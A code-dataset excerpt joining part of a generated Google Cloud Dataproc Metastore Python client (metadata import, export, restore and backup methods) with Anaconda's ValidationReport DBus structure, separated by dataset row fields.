metadata_import: metastore.MetadataImport = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Updates a single import.
Only the description field of MetadataImport is
supported to be updated.
Args:
request (google.cloud.metastore_v1alpha.types.UpdateMetadataImportRequest):
The request object. Request message for
[DataprocMetastore.UpdateMetadataImport][google.cloud.metastore.v1alpha.DataprocMetastore.UpdateMetadataImport].
metadata_import (google.cloud.metastore_v1alpha.types.MetadataImport):
Required. The metadata import to update. The server only
merges fields in the import if they are specified in
``update_mask``.
The metadata import's ``name`` field is used to identify
the metastore import to be updated.
This corresponds to the ``metadata_import`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. A field mask used to specify the fields to be
overwritten in the metadata import resource by the
update. Fields specified in the ``update_mask`` are
relative to the resource (not to the full request). A
field is overwritten if it is in the mask.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataImport`
A metastore resource that imports metadata.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([metadata_import, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.UpdateMetadataImportRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.UpdateMetadataImportRequest):
request = metastore.UpdateMetadataImportRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if metadata_import is not None:
request.metadata_import = metadata_import
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_metadata_import]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("metadata_import.name", request.metadata_import.name),)
),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataImport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def export_metadata(
self,
request: metastore.ExportMetadataRequest = None,
*,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Exports metadata from a service.
Args:
request (google.cloud.metastore_v1alpha.types.ExportMetadataRequest):
The request object. Request message for
[DataprocMetastore.ExportMetadata][google.cloud.metastore.v1alpha.DataprocMetastore.ExportMetadata].
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.MetadataExport`
The details of a metadata export operation.
"""
# Create or coerce a protobuf request object.
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ExportMetadataRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ExportMetadataRequest):
request = metastore.ExportMetadataRequest(request)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.export_metadata]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.MetadataExport,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def restore_service(
self,
request: metastore.RestoreServiceRequest = None,
*,
service: str = None,
backup: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Restores a service from a backup.
Args:
request (google.cloud.metastore_v1alpha.types.RestoreServiceRequest):
The request object. Request message for
[DataprocMetastore.Restore][].
service (str):
Required. The relative resource name of the metastore
service to run restore, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}``
This corresponds to the ``service`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (str):
Required. The relative resource name of the metastore
service backup to restore from, in the following form:
``projects/{project_id}/locations/{location_id}/services/{service_id}/backups/{backup_id}``
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Restore`
The details of a metadata restore operation.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([service, backup])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.RestoreServiceRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.RestoreServiceRequest):
request = metastore.RestoreServiceRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if service is not None:
request.service = service
if backup is not None:
request.backup = backup
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.restore_service]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("service", request.service),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Restore,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def list_backups(
self,
request: metastore.ListBackupsRequest = None,
*,
parent: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListBackupsPager:
r"""Lists backups in a service.
Args:
request (google.cloud.metastore_v1alpha.types.ListBackupsRequest):
The request object. Request message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1alpha.DataprocMetastore.ListBackups].
parent (str):
Required. The relative resource name of the service
whose backups to list, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups``.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.services.dataproc_metastore.pagers.ListBackupsPager:
Response message for
[DataprocMetastore.ListBackups][google.cloud.metastore.v1alpha.DataprocMetastore.ListBackups].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.ListBackupsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.ListBackupsRequest):
request = metastore.ListBackupsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_backups]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListBackupsPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
def get_backup(
self,
request: metastore.GetBackupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> metastore.Backup:
r"""Gets details of a single backup.
Args:
request (google.cloud.metastore_v1alpha.types.GetBackupRequest):
The request object. Request message for
[DataprocMetastore.GetBackup][google.cloud.metastore.v1alpha.DataprocMetastore.GetBackup].
name (str):
Required. The relative resource name of the backup to
retrieve, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.metastore_v1alpha.types.Backup:
The details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.GetBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.GetBackupRequest):
request = metastore.GetBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
def create_backup(
self,
request: metastore.CreateBackupRequest = None,
*,
parent: str = None,
backup: metastore.Backup = None,
backup_id: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Creates a new Backup in a given project and location.
Args:
request (google.cloud.metastore_v1alpha.types.CreateBackupRequest):
The request object. Request message for
[DataprocMetastore.CreateBackup][google.cloud.metastore.v1alpha.DataprocMetastore.CreateBackup].
parent (str):
Required. The relative resource name of the service in
which to create a backup of the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup (google.cloud.metastore_v1alpha.types.Backup):
Required. The backup to create. The ``name`` field is
ignored. The ID of the created backup must be provided
in the request's ``backup_id`` field.
This corresponds to the ``backup`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
backup_id (str):
Required. The ID of the backup, which
is used as the final component of the
backup's name.
This value must be between 1 and 64
characters long, begin with a letter,
end with a letter or number, and consist
of alpha-numeric ASCII characters or
hyphens.
This corresponds to the ``backup_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be
:class:`google.cloud.metastore_v1alpha.types.Backup` The
details of a backup resource.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, backup, backup_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.CreateBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.CreateBackupRequest):
request = metastore.CreateBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if backup is not None:
request.backup = backup
if backup_id is not None:
request.backup_id = backup_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
metastore.Backup,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
def delete_backup(
self,
request: metastore.DeleteBackupRequest = None,
*,
name: str = None,
retry: retries.Retry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation.Operation:
r"""Deletes a single backup.
Args:
request (google.cloud.metastore_v1alpha.types.DeleteBackupRequest):
The request object. Request message for
[DataprocMetastore.DeleteBackup][google.cloud.metastore.v1alpha.DataprocMetastore.DeleteBackup].
name (str):
Required. The relative resource name of the backup to
delete, in the following form:
``projects/{project_number}/locations/{location_id}/services/{service_id}/backups/{backup_id}``.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
The JSON representation for Empty is empty JSON
object {}.
"""
# Create or coerce a protobuf request object.
# Sanity check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a metastore.DeleteBackupRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, metastore.DeleteBackupRequest):
request = metastore.DeleteBackupRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_backup]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Wrap the response in an operation future.
response = operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=metastore.OperationMetadata,
)
# Done; return the response.
return response
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution("google-cloud-metastore",).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("DataprocMetastoreClient",)
| apache-2.0 | -2,842,710,492,423,436,000 | 42.184152 | 171 | 0.611713 | false | 4.744697 | false | false | false |
sgallagher/anaconda | pyanaconda/modules/common/structures/validation.py | 6 | 1962 | #
# DBus structures for validation.
#
# Copyright (C) 2019 Red Hat, Inc. All rights reserved.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from dasbus.structure import DBusData
from dasbus.typing import * # pylint: disable=wildcard-import
__all__ = ["ValidationReport"]
class ValidationReport(DBusData):
"""The validation report."""
def __init__(self):
self._error_messages = []
self._warning_messages = []
def is_valid(self):
"""Is the validation successful?
:return: True or False
"""
return not self._error_messages
def get_messages(self):
"""Get all messages.
:return: a list of strings
"""
return self.error_messages + self.warning_messages
@property
def error_messages(self) -> List[Str]:
"""List of error messages.
:return: a list of strings
"""
return self._error_messages
@error_messages.setter
def error_messages(self, messages: List[Str]):
self._error_messages = list(messages)
@property
def warning_messages(self) -> List[Str]:
"""List of warning messages.
:return: a list of strings
"""
return self._warning_messages
@warning_messages.setter
def warning_messages(self, messages: List[Str]):
self._warning_messages = list(messages)
| gpl-2.0 | -5,752,579,340,876,340,000 | 27.852941 | 71 | 0.66106 | false | 4.139241 | false | false | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.